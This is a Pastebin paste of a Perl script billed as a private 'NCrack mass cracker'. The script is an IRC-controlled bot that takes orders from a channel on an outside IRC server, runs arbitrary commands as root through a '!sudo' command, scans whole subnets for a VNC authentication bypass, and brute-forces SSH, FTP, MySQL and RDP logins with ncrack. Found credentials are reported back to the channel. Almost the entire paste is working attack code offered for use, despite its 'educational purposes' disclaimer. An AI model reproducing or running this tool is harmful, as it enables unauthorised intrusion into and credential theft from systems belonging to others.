independentt

NCrack mass cracker (private)

Apr 23rd, 2016
22,156
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. # Use at your own risk!
  3. #For it to crack you need to install ncrack or be using a l337 OS like KaliLinux v2
  4. #Also you will need to create /user and /pass file (the tested credentials on target)
  5. #The code is still buggy. Sorry but I'm still noob at perl >_>
  6. #invoke the script like this: sudo perl scan.pl (or as root) perl scan.pl  
  7. #This script was made for eduactional purposes only, please don't attack millitary nor government.
  8. #when you think you gotpasswords in your list type to the bot or channel !list will say it found credentials
  9.  
  10. use IO::Socket;
  11. use IO::Socket::INET;
  12. use threads;
  13. use threads::shared;
  14. use Errno qw(EAGAIN);
  15. use strict;
  16. use warnings;
  17. my $line;
  18. our @results : shared;
  19. our $todo = 0;
  20. our $contatore = 0;
  21. my $orig_thread = "yes";
  22. my $start;
  23. my $end;
  24. my $out_file;
  25. my $range = 99999;
  26. my $random_number = int(rand($range));
  27. my @VNC_PORTS = qw/5900 5901/;
  28. my @ncrack_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );
  29. my $splits = 8; # Creates 2^N processes.
  30. our $subnet;
  31. my $server="irc.crimeircd.net"; # irc server
  32. my $porta="6667"; # port
  33. my $nick="Guest$random_number";# nick
  34. my $canale="#RDP"; # canale
  35. my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
  36. $sk->autoflush(1);
  37. print $sk "NICK $nick\r\n";
  38. print $sk "USER Guest$random_number 8 * :Perl bot by independent\r\n";
  39.  
  40.  
  41. while ($line = <$sk>) {
  42.   $line =~ s/\r\n$//;
  43.    warn "$line";
  44.    if ($line=~ /PING/) {
  45.    print $sk "PONG :$server\r\n";
  46.    print $sk "JOIN $canale \r\n";
  47.    printa("?Ping Pong!, pastebin.com/raw/cp5BZnv4");
  48.  
  49.   }
  50.   if ($line=~ /nospoof/) {
  51.    print $sk "NOTICE IRC :mIRC v7.45\r\n";
  52.     print $sk "CAP LS\r\n";
  53.    print $sk "CAP END\r\n";
  54.   }
  55.     if ($line=~ /!help/) {
  56. printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  57.   }
  58.   if ($line=~ /!list/)
  59.   {
  60.  
  61.     my $file = 'xploits.log';
  62.     open my $fh, '<', $file or warn "Could not open '$file' $!\n";
  63.  
  64.     while (my $lines = <$fh>) {
  65.       chomp $lines;
  66.       if ($lines=~ /'/) {
  67.         printa("$lines");
  68.       }
  69.     }
  70.   }
  71.   if ($line=~ /!reload/)
  72.   {
  73.     printa("Reloading...");
  74.     my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill ncrack");
  75.     system(@cmd);
  76.   }
  77.   if ($line=~ /!die/)
  78.   {
  79.     printa("Dying...");
  80.     my @cmd = ("sudo pkill perl && sudo pkill ncrack");
  81.     system(@cmd);
  82.   }
  83.   if ($line=~ /!sudo\s+(.*)/)
  84.   {
  85.         my $command = $1;
  86.         printa("Done: $command ");
  87.     my $cmd = "sudo $command";
  88.     my @output = `$cmd 2>&1 3>&1`;
  89.     foreach(@output) {
  90.       printa("$_\r\n");
  91.     }
  92.   }
  93.  
  94.  
  95.   if ($line=~ /!scan (.+)/)
  96.   {
  97.  
  98.  
  99.     $todo = 0;
  100.     $subnet = $1;
  101.     if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
  102.  
  103.       # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
  104.       $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
  105.       $subnet .= ".";
  106.       printa("Scanning subnet ${subnet}x\n");
  107.  
  108.       CHECK: {
  109.         unless ($splits >= 0 && $splits <= 8) {
  110.           die "ERROR: Do not split $splits times--that makes no sense.\n";
  111.         }
  112.       }
  113.  
  114.       # Ugly, but this works.
  115.       DivideWork() if $splits >= 1;
  116.       DivideWork() if $splits >= 2;
  117.       DivideWork() if $splits >= 3;
  118.       DivideWork() if $splits >= 4;
  119.       DivideWork() if $splits >= 5;
  120.       DivideWork() if $splits >= 6;
  121.       DivideWork() if $splits >= 7;
  122.       DivideWork() if $splits >= 8;
  123.  
  124.       $start = $todo << (8 - $splits);
  125.       $end = $start + (256 / (2**$splits)) - 1;
  126.  
  127.       foreach ($start .. $end) {
  128.  
  129.         Scan_ALL($_);
  130.  
  131.       }
  132.      }
  133.    
  134.    else {
  135.       printa("Are you brain-dead? Use a correct IP format. ");
  136.     }
  137.  
  138.   }
  139. }
  140.  
  141.  
  142.   ####################################
  143.  
  144.   sub DivideWork {
  145.     my $pid;
  146.  
  147.     FORK: {
  148.       $todo *= 2;
  149.       if ($pid = fork) {
  150.         # Parent
  151.         ++$todo;
  152.  
  153.         } elsif (defined $pid) {
  154.         # Child
  155.         $orig_thread = "no";
  156.  
  157.         } elsif ($! == EAGAIN) {
  158.         # Recoverable forking error.
  159.         sleep 7;
  160.         redo FORK;
  161.  
  162.         } else {
  163.         # Unable to fork.
  164.         printa("Unable to fork: $!\n");
  165.  
  166.       }
  167.     }
  168.   }
  169.  
  170.  
  171.  
  172.   sub Scan_ALL {
  173.     # Scan for OpenVNC 4.11 authentication bypass.
  174.  
  175.     my $hostnum = shift;
  176.     my $host = $subnet . $hostnum;
  177.     my $sock;
  178.     my $proto_ver;
  179.     my $ignored;
  180.     my $auth_type;
  181.     my $sec_types;
  182.     my $vnc_data;
  183.  
  184.  
  185.     $host or printa("ERROR: missing Host IP address Scan_ALL.");
  186.  
  187.     # The host numbers .0 and .255 are reserved; ignore them.
  188.     if ($hostnum <= 0 or $hostnum >= 255) { return; }
  189.  
  190.     # Format things nicely--that crazy formula just adds spaces.
  191.     $results[$hostnum] = "$host";
  192.     $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
  193.     foreach my $port (@VNC_PORTS)
  194.     {
  195.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')) {
  196.  
  197.         $sock->read($proto_ver, 12);
  198.         print $sock $proto_ver;
  199.  
  200.         # Get supported security types and ignore them.
  201.         $sock->read($sec_types, 1);
  202.  
  203.         $sock->read($ignored, unpack('C', $sec_types));
  204.         # Claim that we only support no authentication.
  205.         print $sock "\x01";
  206.  
  207.  
  208.         # We should get "0000" back, indicating that they won't fall back to no authentication.
  209.         $sock->read($auth_type, 4);
  210.         if (unpack('I', $auth_type)) {
  211.           close($sock);
  212.           return;
  213.         }
  214.  
  215.         # Client initialize.
  216.         print $sock "\x01";
  217.  
  218.         # If the server starts sending data, we're in.
  219.         $sock->read($vnc_data, 4);
  220.         printa("[Xploiting VNC] $host");
  221.         if (unpack('I', $vnc_data)) {
  222.           $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
  223.           printa("9,3 [ $port ] $results[$hostnum] $port ");
  224.         }
  225.       }
  226.     }
  227.     foreach my $port (@ncrack_PORTS)
  228.     {
  229.       if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port->[0], Proto => 'tcp')) {
  230.         close($sock);
  231.         printa("[Cracking " . $port->[1] . "] $host");
  232.         my @cmdncrack = ("ncrack -U /user -P /pass " . lc($port->[1]) . "://" . $host . ",at=5,cl=1,CL=3,cd=5s,cr=0,to=2h --connection-limit 64 -v -f >>xploits.log");
  233.         system(@cmdncrack);
  234.         return;
  235.       }
  236.     }
  237.  
  238.     close($sock);
  239.     return;
  240.   }
  241.  
  242.   sub printa {
  243.     print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  244.   }
RAW Paste Data